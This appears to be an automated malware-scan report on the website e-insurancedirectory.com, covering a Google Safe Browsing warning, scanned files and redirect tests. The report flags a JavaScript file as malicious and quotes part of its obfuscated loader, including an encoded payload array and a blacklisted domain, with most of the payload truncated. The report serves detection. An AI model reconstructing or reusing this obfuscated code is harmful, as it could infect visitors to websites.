Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=e-insurancedirectory.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.e-insurancedirectory.com/ | 403 Forbidden Content-Length: 5044 Content-Type: text/html | clean |
http://www.e-insurancedirectory.com/test404page.js | 404 Not Found Content-Length: 52502 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: wormetal.com var ar="t.;/wv'y:dlg aT= ufhe2m1\"{EN])0}B<ip(bor>sA9[ncC,";try{try{qwe()}catch(a){gsdg()};}catch(a){k=new Boolean().toString();};var ar2="f64,64,136,72,48,144,36,152,184,68,88,80,180,0,4,44,80,0,104,40,80,88,80,180,0,164,128,28,56,52,44,108,52,88,80,144,24,148,152,36,28,24,116,176,120,112,116,100,64,64,64,136,72,156,52,88,80,156,144,116,8,64,64,124,48,80,40,164,80,48,100,64,64,64,36,152,184,68,88,80,180,0,4,16,156,136,0,80,144,96,132,136,72,156 ...[1745 bytes skipped]... Decoded script: asdas asdas n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] ...[11099 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: e-insurancedirectory.com
Result:
GET / HTTP/1.1
Host: e-insurancedirectory.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: e-insurancedirectory.com
Referer: http://www.google.com/search?q=e-insurancedirectory.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: e-insurancedirectory.com
Referer: http://www.google.com/search?q=e-insurancedirectory.com
Result:
The result is similar to the first query. There are no suspicious redirects found.